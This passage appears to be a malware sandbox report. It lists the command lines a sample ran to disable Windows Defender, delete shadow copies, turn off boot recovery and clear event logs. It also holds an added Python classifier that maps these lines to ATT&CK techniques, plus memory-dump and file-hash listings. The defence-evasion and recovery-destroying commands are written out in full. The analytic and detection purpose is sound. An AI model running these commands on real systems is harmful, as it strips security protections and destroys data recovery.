sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12dde" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true
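The process list above is the entire defence-evasion and recovery-inhibition sequence, expressed as command lines. The classifier below is an added example, not part of the sandbox report: it runs over process-creation command lines such as these, maps each to a category and an ATT&CK technique (the technique mapping is the editor's, not the sandbox's), skips the cmd.exe /c wrappers because the child process carries the actual action, and collects the services stopped or disabled and the event logs cleared. Sample input is copied from the Processes section above, plus one constructed benign svchost.exe line as a control.

```python
import re
from collections import Counter

# Rule table: (label, ATT&CK technique, pattern). Patterns are anchored to the executing
# image so the cmd.exe /c wrapper seen above does not count an action twice; the wrapper
# itself is skipped in summarize(). net.exe hands its arguments to net1.exe (also visible
# above), so only the net.exe parent is matched. Technique IDs are the editor's mapping.
WRAPPER_RE = re.compile(r'^"?cmd(\.exe)?"?\s+/c\s', re.I)
RULES = [
    ("service_stop",         "T1489",     re.compile(r'^net(\.exe)?\s+stop\s+"?(?P<svc>[^"\s]+)"?', re.I)),
    ("service_disable",      "T1489",     re.compile(r'^sc(\.exe)?\s+config\s+"?(?P<svc>[^"\s]+)"?\s+start=\s*disabled', re.I)),
    ("defender_policy",      "T1562.001", re.compile(r'^reg(\.exe)?\s+(?:add|delete)\s+"HKLM\\Software\\Policies\\Microsoft\\Windows Defender', re.I)),
    ("defender_service",     "T1562.001", re.compile(r'^reg(\.exe)?\s+add\s+"HKLM\\System\\CurrentControlSet\\Services\\(?P<svc>WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)"\s+/v\s+"Start".*/d\s+"4"', re.I)),
    ("defender_task",        "T1562.001", re.compile(r'^schtasks(\.exe)?\s+/Change\s+/TN\s+".*(?:Windows Defender|ExploitGuard).*"\s+/Disable', re.I)),
    ("defender_mppref",      "T1562.001", re.compile(r'^(?:.*\\)?powershell(\.exe)?\s+Set-MpPreference\s+-Disable\w+\s+\$true', re.I)),
    ("defender_definitions", "T1562.001", re.compile(r'^"?[^"]*MpCmdRun\.exe"?\s+-RemoveDefinitions', re.I)),
    ("defender_etw",         "T1562.002", re.compile(r'Autologger\\Defender\w*Logger"\s+/v\s+"Start".*/d\s+"0"', re.I)),
    ("shadow_delete",        "T1490",     re.compile(r'^(?:vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)', re.I)),
    ("boot_recovery_off",    "T1490",     re.compile(r'^bcdedit(\.exe)?\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)', re.I)),
    ("eventlog_clear",       "T1070.001", re.compile(r'^wevtutil(\.exe)?\s+cl\s+(?P<log>\w+)', re.I)),
]


def classify(cmdline):
    """Return (label, technique, match) for the first rule that fires, else None."""
    for label, technique, rx in RULES:
        m = rx.search(cmdline.strip())
        if m:
            return label, technique, m
    return None


def summarize(cmdlines):
    """Aggregate command lines into per-label and per-technique counts plus the concrete
    services stopped/disabled and event logs cleared; unmatched lines are returned as-is."""
    counts, techniques = Counter(), Counter()
    stopped, disabled, cleared = set(), set(), set()
    unmatched = []
    for line in cmdlines:
        if WRAPPER_RE.match(line.strip()):
            continue  # the child process carries the action and is classified on its own
        hit = classify(line)
        if hit is None:
            unmatched.append(line)
            continue
        label, technique, m = hit
        counts[label] += 1
        techniques[technique] += 1
        if label == "service_stop":
            stopped.add(m["svc"])
        elif label == "service_disable":
            disabled.add(m["svc"])
        elif label == "eventlog_clear":
            cleared.add(m["log"].lower())
    return {"counts": counts, "techniques": techniques, "stopped_services": stopped,
            "disabled_services": disabled, "cleared_logs": cleared, "unmatched": unmatched}


# Sample input copied from the Processes section above; the final svchost.exe line is a
# constructed benign control and does not appear in the report.
SAMPLE_CMDLINES = [
    r'net.exe stop "SamSs" /y',
    r'net.exe stop "VSS" /y',
    r'net.exe stop "wbengine" /y',
    r'sc.exe config "VSS" start= disabled',
    r'sc.exe config "wbengine" start= disabled',
    r'reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wmic.exe SHADOWCOPY /nointeractive',
    r'wmic.exe shadowcopy delete',
    r'bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures',
    r'bcdedit.exe /set {default} recoveryenabled no',
    r'wevtutil.exe cl system',
    r'wevtutil.exe cl security',
    r'wevtutil.exe cl application',
    r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true',
    r'powershell Set-MpPreference -DisableIOAVProtection $true',
    r'"C:\Windows\system32\svchost.exe" -k netsvcs',
]

if __name__ == "__main__":
    s = summarize(SAMPLE_CMDLINES)
    for technique, n in sorted(s["techniques"].items()):
        print(f"{technique:<10} {n}")
    print("stopped:", sorted(s["stopped_services"]), "cleared logs:", sorted(s["cleared_logs"]))
    print("unmatched:", s["unmatched"])
```

Note that `wmic.exe SHADOWCOPY /nointeractive` on its own is left unmatched on purpose: it only switches off wmic's interactive prompting and deletes nothing, whereas the following `wmic.exe shadowcopy delete` does. Any one of these categories is a routine administrative action; it is the co-occurrence of service stops, Defender policy writes, shadow-copy deletion, boot-recovery changes and log clearing within one parent process, as seen in this report, that should page someone.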

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
US 168.61.215.74:123 time.windows.com udp

Files

memory/3164-115-0x0000000000000000-mapping.dmp

memory/672-116-0x0000000000000000-mapping.dmp

memory/1368-117-0x0000000000000000-mapping.dmp

memory/1164-118-0x0000000000000000-mapping.dmp

memory/972-119-0x0000000000000000-mapping.dmp

memory/2460-120-0x0000000000000000-mapping.dmp

memory/1064-121-0x0000000000000000-mapping.dmp

memory/380-122-0x0000000000000000-mapping.dmp

memory/3796-123-0x0000000000000000-mapping.dmp

memory/4000-124-0x0000000000000000-mapping.dmp

memory/1988-125-0x0000000000000000-mapping.dmp

memory/3632-126-0x0000000000000000-mapping.dmp

memory/3844-127-0x0000000000000000-mapping.dmp

memory/1472-128-0x0000000000000000-mapping.dmp

memory/3032-129-0x0000000000000000-mapping.dmp

memory/2212-130-0x0000000000000000-mapping.dmp

memory/2112-131-0x0000000000000000-mapping.dmp

memory/2092-132-0x0000000000000000-mapping.dmp

memory/1232-133-0x0000000000000000-mapping.dmp

memory/696-134-0x0000000000000000-mapping.dmp

memory/1808-135-0x0000000000000000-mapping.dmp

memory/2164-136-0x0000000000000000-mapping.dmp

memory/2376-137-0x0000000000000000-mapping.dmp

memory/1488-138-0x0000000000000000-mapping.dmp

memory/1720-139-0x0000000000000000-mapping.dmp

memory/1228-140-0x0000000000000000-mapping.dmp

memory/2200-141-0x0000000000000000-mapping.dmp

memory/2132-142-0x0000000000000000-mapping.dmp

memory/2156-143-0x0000000000000000-mapping.dmp

memory/2944-144-0x0000000000000000-mapping.dmp

memory/3668-145-0x0000000000000000-mapping.dmp

memory/668-146-0x0000000000000000-mapping.dmp

memory/2308-147-0x0000000000000000-mapping.dmp

memory/2284-148-0x0000000000000000-mapping.dmp

memory/2908-149-0x0000000000000000-mapping.dmp

memory/3912-150-0x0000000000000000-mapping.dmp

memory/2256-151-0x0000000000000000-mapping.dmp

memory/3932-152-0x0000000000000000-mapping.dmp

memory/2104-153-0x0000000000000000-mapping.dmp

memory/888-154-0x0000000000000000-mapping.dmp

memory/1216-155-0x0000000000000000-mapping.dmp

memory/1364-156-0x0000000000000000-mapping.dmp

memory/2348-157-0x0000000000000000-mapping.dmp

memory/380-158-0x0000000000000000-mapping.dmp

memory/1692-159-0x0000000000000000-mapping.dmp

memory/1396-160-0x0000000000000000-mapping.dmp

memory/1112-161-0x0000000000000000-mapping.dmp

memory/448-162-0x0000000000000000-mapping.dmp

memory/2212-163-0x0000000000000000-mapping.dmp

memory/1140-164-0x0000000000000000-mapping.dmp

memory/508-165-0x0000000000000000-mapping.dmp

memory/1092-166-0x0000000000000000-mapping.dmp

memory/968-167-0x0000000000000000-mapping.dmp

memory/2180-168-0x0000000000000000-mapping.dmp

memory/2060-169-0x0000000000000000-mapping.dmp

memory/1492-170-0x0000000000000000-mapping.dmp

memory/2120-171-0x0000000000000000-mapping.dmp

memory/3092-172-0x0000000000000000-mapping.dmp

memory/2340-173-0x0000000000000000-mapping.dmp

memory/1496-174-0x0000000000000000-mapping.dmp

memory/1028-175-0x0000000000000000-mapping.dmp

memory/2272-176-0x0000000000000000-mapping.dmp

memory/3128-177-0x0000000000000000-mapping.dmp

memory/2216-178-0x0000000000000000-mapping.dmp

memory/2108-180-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-179-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-181-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-182-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-183-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-184-0x0000021F59920000-0x0000021F59942000-memory.dmp

memory/2108-185-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-186-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-187-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-188-0x0000021F73F20000-0x0000021F73F96000-memory.dmp

memory/2108-189-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-193-0x0000021F598D0000-0x0000021F598D2000-memory.dmp

memory/2108-194-0x0000021F598D3000-0x0000021F598D5000-memory.dmp

memory/2108-195-0x0000021F598D6000-0x0000021F598D8000-memory.dmp

memory/2108-196-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-197-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-217-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-218-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-219-0x0000021F598D8000-0x0000021F598D9000-memory.dmp

memory/3076-221-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/3076-222-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-223-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-224-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-225-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-226-0x000001D2B18F0000-0x000001D2B1912000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 daca2eb0c15c4b16335f40f34f730407
SHA1 492da0ed645ed1b2a52c6ac6ae17f7b1ade086d8
SHA256 b1d1833e6e44405d6ce5eb3b4fa74b4964429873469c9ee96addd839bcb3e442
SHA512 1cfd87ace13a58a07ae53101d86fbc3f908762254091df81e49d00cafb74cfa2a3e214d86ce2ed5e5ce57a10a935aee1790f80a28025cf12651535d7956e5589

memory/3076-228-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-229-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-230-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-231-0x000001D2B1AA0000-0x000001D2B1B16000-memory.dmp

memory/3076-232-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-236-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-237-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-258-0x000001D297323000-0x000001D297325000-memory.dmp

memory/3076-257-0x000001D297320000-0x000001D297322000-memory.dmp

memory/3076-259-0x000001D297326000-0x000001D297328000-memory.dmp

memory/3076-262-0x000001D297328000-0x000001D297329000-memory.dmp